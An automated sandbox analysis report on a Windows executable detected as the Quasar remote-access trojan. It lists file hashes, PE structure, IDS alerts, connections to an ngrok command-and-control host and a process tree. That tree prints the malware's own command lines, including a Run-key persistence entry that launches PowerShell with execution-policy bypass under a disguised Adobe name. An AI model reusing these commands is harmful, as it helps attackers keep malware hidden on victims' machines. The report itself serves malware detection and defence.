                            Entropy (8bit):4.6103462178019665
                            Encrypted:false
                            SSDEEP:12:PR45pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:JKdUOAokItULVDv
                            MD5:7F48CA448373AA5F29388ECD8774273A
                            SHA1:752382BEB77E9571198056440BC31E38794E742B
                            SHA-256:45C2AAF408A9D5F26552732E3B911AB00D2D579736FA6F18E6B3DA7563F722A7
                            SHA-512:4A18F00254BA4958EC3D4ED81B4E8CA87DE73F84FAF70EBFA639D051AD79C7C48AD4A12C702A18047D3DC2D9105BAAC562E5B9857CA5CFED32E335CF061533A7
                            Malicious:false
                            Preview:..Pinging 878411 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                            File type:PE32+ executable (console) x86-64, for MS Windows
                            Entropy (8bit):6.926297122794392
                            TrID:
                            • Win64 Executable Console (202006/5) 92.65%
                            • Win64 Executable (generic) (12005/4) 5.51%
                            • Generic Win/DOS Executable (2004/3) 0.92%
                            • DOS Executable Generic (2002/1) 0.92%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:full.exe
                            File size:17'277'440 bytes
                            MD5:b59ee68c7c3ee01e14a7516628368046
                            SHA1:7a0cc3f080d1c2143e770d1fd50dc7f20bef9f7a
                            SHA256:e32128f875d42818741d274d447aacf2cdc15cc78a2ce0a393d629c4c90c779d
                            SHA512:3bfeb88f787da0784e3615d9b048589cfdc3492dcb24b8a508f6fb2d6170049b86049f0942e19041b5d262cde3479d338aa5fd6ce654c6a02b6b78590c738c6b
                            SSDEEP:196608:NKuXJJx9MbelAUHXTuj4KxT931ugenDTYe6cZK3F:cuXXx91WgDKd93renDTYz2K
                            TLSH:2E077D47EC5105E9C9AD9630C6AA8353BB757C484B3267D72B60F2382F77BE05AB9340
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........H...B...."......FV..........~........@...........................................`... ............................
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0x477e00
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows cui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:d42595b695fc008ef2c56aabd8efd68e
                            Instruction
                            jmp 00007FBB887D9BC0h
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            dec eax
                            mov ebp, esp
                            pushfd
                            cld
                            dec eax
                            sub esp, 000000E0h
                            dec eax
                            mov dword ptr [esp], edi
                            dec eax
                            mov dword ptr [esp+08h], esi
                            dec eax
                            mov dword ptr [esp+10h], ebp
                            dec eax
                            mov dword ptr [esp+18h], ebx
                            dec esp
                            mov dword ptr [esp+20h], esp
                            dec esp
                            mov dword ptr [esp+28h], ebp
                            dec esp
                            mov dword ptr [esp+30h], esi
                            dec esp
                            mov dword ptr [esp+38h], edi
                            movups dqword ptr [esp+40h], xmm6
                            movups dqword ptr [esp+50h], xmm7
                            inc esp
                            movups dqword ptr [esp+60h], xmm0
                            inc esp
                            movups dqword ptr [esp+70h], xmm1
                            inc esp
                            movups dqword ptr [esp+00000080h], xmm2
                            inc esp
                            movups dqword ptr [esp+00000090h], xmm3
                            inc esp
                            movups dqword ptr [esp+000000A0h], xmm4
                            inc esp
                            movups dqword ptr [esp+000000B0h], xmm5
                            inc esp
                            movups dqword ptr [esp+000000C0h], xmm6
                            inc esp
                            movups dqword ptr [esp+000000D0h], xmm7
                            inc ebp
                            xorps xmm7, xmm7
                            dec ebp
                            xor esi, esi
                            dec eax
                            mov eax, dword ptr [00B15502h]
                            dec eax
                            mov eax, dword ptr [eax]
                            dec eax
                            cmp eax, 00000000h
                            je 00007FBB887DD4A5h
                            dec esp
                            mov esi, dword ptr [eax]
                            dec eax
                            sub esp, 10h
                            dec eax
                            mov eax, ecx
                            dec eax
                            mov ebx, edx
                            call 00007FBB887E511Bh
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xfc90000x53e.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0xb980000x2016c.pdata
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xfca0000x182b0.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xa94ac00x178.data
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x5644570x56460059ebf4d6632ac41ec47120cd9bab7069unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x5660000x52d3d00x52d4005c0d34c566e3294687287ccfc786202bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0xa940000x1038780xae2008293285e8b7b6fe325d9afa623fe5f5bFalse0.36880271895190236data5.704517151264934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .pdata0xb980000x2016c0x2020037651710ea6c8a12e2ac7c0e3c0afc52False0.4023285505836576data5.618578282721329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .xdata0xbb90000xb40x200205f842001ec7911332521c3bc6919acFalse0.2265625data1.783206012798912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            /40xbba0000x14c0x200aaf28638a5fca2ae9b61c2d0ecb5c6e7False0.697265625data5.610479515469117IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /190xbbb0000xd9fc50xda000290dba349d2fc926f87be3c5cd5214b6False1.0002911768922018data7.9969101062011205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /320xc950000x3249a0x3260099e96e7760b735a7f433be53c53fd0fbFalse0.9949742168114144data7.935984743009978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /460xcc80000x300x20040cca7c46fc713b4f088e5d440ca7931False0.103515625data0.8556848540171443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /650xcc90000x199d8d0x199e00ada5de2453a020c10cfcc79dca4c2ff5False0.9996467816026228data7.998336691421299IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /780xe630000x115c970x115e0095c07d3898507b6a9a812a07afa87f27False0.9941019666554206data7.9959074136303165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            /900xf790000x4f1c90x4f20096bed4ea04ff9e35c7e63616da677964False0.973146845379147data7.813153054319244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .idata0xfc90000x53e0x600fae11b7bd79e8528b3172f8d1e694bfeFalse0.376953125OpenPGP Public Key4.017189066074398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .reloc0xfca0000x182b00x1840084080c27783ad550de422f02ec508194False0.20861187177835053data5.434229445574159IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .symtab0xfe30000xf58e60xf5a0098132cb21e8436f39df3e8efd1ccaed1False0.18489483937659032data5.40023659595628IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            DLLImport
                            kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-12-12T18:03:39.644015+01002027619ET MALWARE Observed Malicious SSL Cert (Quasar CnC)118.231.236.5220545192.168.2.949709TCP
                            2024-12-12T18:03:39.644015+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert118.231.236.5220545192.168.2.949709TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 12, 2024 18:03:38.052968025 CET4970920545192.168.2.918.231.236.52
                            Dec 12, 2024 18:03:38.172847986 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:38.172938108 CET4970920545192.168.2.918.231.236.52
                            Dec 12, 2024 18:03:38.179888964 CET4970920545192.168.2.918.231.236.52
                            Dec 12, 2024 18:03:38.299892902 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:39.517429113 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:39.517503977 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:39.517590046 CET4970920545192.168.2.918.231.236.52
                            Dec 12, 2024 18:03:39.522495031 CET4970920545192.168.2.918.231.236.52
                            Dec 12, 2024 18:03:39.644015074 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:40.006649971 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:40.059659004 CET4970920545192.168.2.918.231.236.52
                            Dec 12, 2024 18:03:44.344208956 CET49711443192.168.2.9108.181.61.49
                            Dec 12, 2024 18:03:44.344264030 CET44349711108.181.61.49192.168.2.9
                            Dec 12, 2024 18:03:44.344336987 CET49711443192.168.2.9108.181.61.49
                            Dec 12, 2024 18:03:44.345535994 CET49711443192.168.2.9108.181.61.49
                            Dec 12, 2024 18:03:44.345552921 CET44349711108.181.61.49192.168.2.9
                            Dec 12, 2024 18:03:46.774550915 CET44349711108.181.61.49192.168.2.9
                            Dec 12, 2024 18:03:46.774629116 CET49711443192.168.2.9108.181.61.49
                            Dec 12, 2024 18:03:46.778476000 CET49711443192.168.2.9108.181.61.49
                            Dec 12, 2024 18:03:46.778482914 CET44349711108.181.61.49192.168.2.9
                            Dec 12, 2024 18:03:46.778748989 CET44349711108.181.61.49192.168.2.9
                            Dec 12, 2024 18:03:46.825324059 CET49711443192.168.2.9108.181.61.49
                            Dec 12, 2024 18:03:46.870687008 CET49711443192.168.2.9108.181.61.49
                            Dec 12, 2024 18:03:46.911330938 CET44349711108.181.61.49192.168.2.9
                            Dec 12, 2024 18:03:47.487967014 CET44349711108.181.61.49192.168.2.9
                            Dec 12, 2024 18:03:47.488174915 CET44349711108.181.61.49192.168.2.9
                            Dec 12, 2024 18:03:47.488234997 CET49711443192.168.2.9108.181.61.49
                            Dec 12, 2024 18:03:47.563534021 CET49711443192.168.2.9108.181.61.49
                            Dec 12, 2024 18:03:47.832324028 CET4970920545192.168.2.918.231.236.52
                            Dec 12, 2024 18:03:47.952116966 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:47.952171087 CET4970920545192.168.2.918.231.236.52
                            Dec 12, 2024 18:03:48.071888924 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:48.458216906 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:48.684727907 CET4970920545192.168.2.918.231.236.52
                            Dec 12, 2024 18:03:52.856246948 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:52.862281084 CET4970920545192.168.2.918.231.236.52
                            Dec 12, 2024 18:03:52.982307911 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:52.982389927 CET4970920545192.168.2.918.231.236.52
                            Dec 12, 2024 18:03:53.102494001 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:53.170751095 CET4970920545192.168.2.918.231.236.52
                            Dec 12, 2024 18:03:53.291965961 CET205454970918.231.236.52192.168.2.9
                            Dec 12, 2024 18:03:53.292033911 CET4970920545192.168.2.918.231.236.52
                            TimestampSource PortDest PortSource IPDest IP
                            Dec 12, 2024 18:03:37.765110016 CET6515753192.168.2.91.1.1.1
                            Dec 12, 2024 18:03:38.044831991 CET53651571.1.1.1192.168.2.9
                            Dec 12, 2024 18:03:44.164659023 CET5377653192.168.2.91.1.1.1
                            Dec 12, 2024 18:03:44.302007914 CET53537761.1.1.1192.168.2.9
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Dec 12, 2024 18:03:37.765110016 CET192.168.2.91.1.1.10x6e6fStandard query (0)1.tcp.sa.ngrok.ioA (IP address)IN (0x0001)false
                            Dec 12, 2024 18:03:44.164659023 CET192.168.2.91.1.1.10x8f73Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Dec 12, 2024 18:03:38.044831991 CET1.1.1.1192.168.2.90x6e6fNo error (0)1.tcp.sa.ngrok.io18.231.236.52A (IP address)IN (0x0001)false
                            Dec 12, 2024 18:03:44.302007914 CET1.1.1.1192.168.2.90x8f73No error (0)ipwho.is108.181.61.49A (IP address)IN (0x0001)false
                            • ipwho.is
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.949711108.181.61.494434792C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            TimestampBytes transferredDirectionData
                            2024-12-12 17:03:46 UTC150OUTGET / HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
                            Host: ipwho.is
                            Connection: Keep-Alive
                            2024-12-12 17:03:47 UTC223INHTTP/1.1 200 OK
                            Date: Thu, 12 Dec 2024 17:03:47 GMT
                            Content-Type: application/json; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Server: ipwhois
                            Access-Control-Allow-Headers: *
                            X-Robots-Tag: noindex
                            2024-12-12 17:03:47 UTC1021INData Raw: 33 66 31 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f
                            Data Ascii: 3f1{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.189", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yo


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:12:03:06
                            Start date:12/12/2024
                            Path:C:\Users\user\Desktop\full.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\full.exe"
                            Imagebase:0x170000
                            File size:17'277'440 bytes
                            MD5 hash:B59EE68C7C3EE01E14A7516628368046
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:12:03:07
                            Start date:12/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:12:03:28
                            Start date:12/12/2024
                            Path:C:\Windows\System32\reg.exe
                            Wow64 process (32bit):false
                            Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f
                            Imagebase:0x7ff72af90000
                            File size:77'312 bytes
                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:5
                            Start time:12:03:28
                            Start date:12/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1
                            Imagebase:0x7ff760310000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1736823660.0000020C23375000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:12:03:34
                            Start date:12/12/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                            Imagebase:0xe0000
                            File size:42'064 bytes
                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:7
                            Start time:12:03:34
                            Start date:12/12/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                            Imagebase:0x410000
                            File size:42'064 bytes
                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:8
                            Start time:12:03:34
                            Start date:12/12/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                            Imagebase:0xa50000
                            File size:42'064 bytes
                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1946047934.0000000003036000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1913763802.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1946047934.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1913763802.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:moderate
                            Has exited:true

                            Target ID:11
                            Start time:12:03:52
                            Start date:12/12/2024
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat" "
                            Imagebase:0xc50000
                            File size:236'544 bytes
                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:12:03:52
                            Start date:12/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff70f010000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:12:03:52
                            Start date:12/12/2024
                            Path:C:\Windows\SysWOW64\chcp.com
                            Wow64 process (32bit):true
                            Commandline:chcp 65001
                            Imagebase:0x9b0000
                            File size:12'800 bytes
                            MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:14
                            Start time:12:03:52
                            Start date:12/12/2024
                            Path:C:\Windows\SysWOW64\PING.EXE
                            Wow64 process (32bit):true
                            Commandline:ping -n 10 localhost
                            Imagebase:0xde0000
                            File size:18'944 bytes
                            MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:9.9%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:85
                              Total number of Limit Nodes:12
                              execution_graph 23244 786c2b0 23245 786c43b 23244->23245 23246 786c2d6 23244->23246 23246->23245 23249 786c528 23246->23249 23253 786c530 PostMessageW 23246->23253 23250 786c52d PostMessageW 23249->23250 23252 786c59c 23250->23252 23252->23246 23254 786c59c 23253->23254 23254->23246 23255 13e4668 23256 13e4676 23255->23256 23261 13e6de0 23256->23261 23259 13e4704 23262 13e6e05 23261->23262 23270 13e6edf 23262->23270 23274 13e6ef0 23262->23274 23263 13e46e9 23266 13e421c 23263->23266 23267 13e4227 23266->23267 23282 13e8560 23267->23282 23269 13e8806 23269->23259 23272 13e6f17 23270->23272 23271 13e6ff4 23271->23271 23272->23271 23278 13e6414 23272->23278 23276 13e6f17 23274->23276 23275 13e6ff4 23275->23275 23276->23275 23277 13e6414 CreateActCtxA 23276->23277 23277->23275 23279 13e7370 CreateActCtxA 23278->23279 23281 13e7433 23279->23281 23283 13e856b 23282->23283 23286 13e8580 23283->23286 23285 13e88dd 23285->23269 23287 13e858b 23286->23287 23290 13e85b0 23287->23290 23289 13e89ba 23289->23285 23291 13e85bb 23290->23291 23294 13e85e0 23291->23294 23293 13e8aad 23293->23289 23295 13e85eb 23294->23295 23297 13e9e93 23295->23297 23300 13ebed1 23295->23300 23296 13e9ed1 23296->23293 23297->23296 23306 13edf70 23297->23306 23301 13ebeda 23300->23301 23302 13ebe91 23300->23302 23310 13ebf08 23301->23310 23313 13ebef8 23301->23313 23302->23297 23303 13ebee6 23303->23297 23307 13edf91 23306->23307 23308 13edfb5 23307->23308 23321 13ee120 23307->23321 23308->23296 23316 13ebff0 23310->23316 23311 13ebf17 23311->23303 23314 13ebf17 23313->23314 23315 13ebff0 GetModuleHandleW 23313->23315 23314->23303 23315->23314 23317 13ec034 23316->23317 23318 13ec011 23316->23318 23317->23311 23318->23317 23319 13ec238 GetModuleHandleW 23318->23319 23320 13ec265 23319->23320 23320->23311 23322 13ee12d 23321->23322 23324 13ee166 23322->23324 23325 13ec464 23322->23325 23324->23308 23326 13ec46f 23325->23326 23327 13ee1d8 23326->23327 23329 13ec498 23326->23329 23330 13ec4a3 23329->23330 23331 13e85e0 3 API calls 23330->23331 23332 13ee247 23331->23332 23335 13ee2c0 23332->23335 23333 13ee256 23333->23327 23336 13ee2ee 23335->23336 23337 13ec530 GetFocus 23336->23337 23338 13ee317 23336->23338 23340 13ee3bf 23336->23340 23337->23338 23339 13ee3ba KiUserCallbackDispatcher 23338->23339 23338->23340 23339->23340 23341 13e6788 DuplicateHandle 23342 13e681e 23341->23342 23343 13e6540 23344 13e6586 GetCurrentProcess 23343->23344 23346 13e65d8 GetCurrentThread 23344->23346 23347 13e65d1 23344->23347 23348 13e660e 23346->23348 23349 13e6615 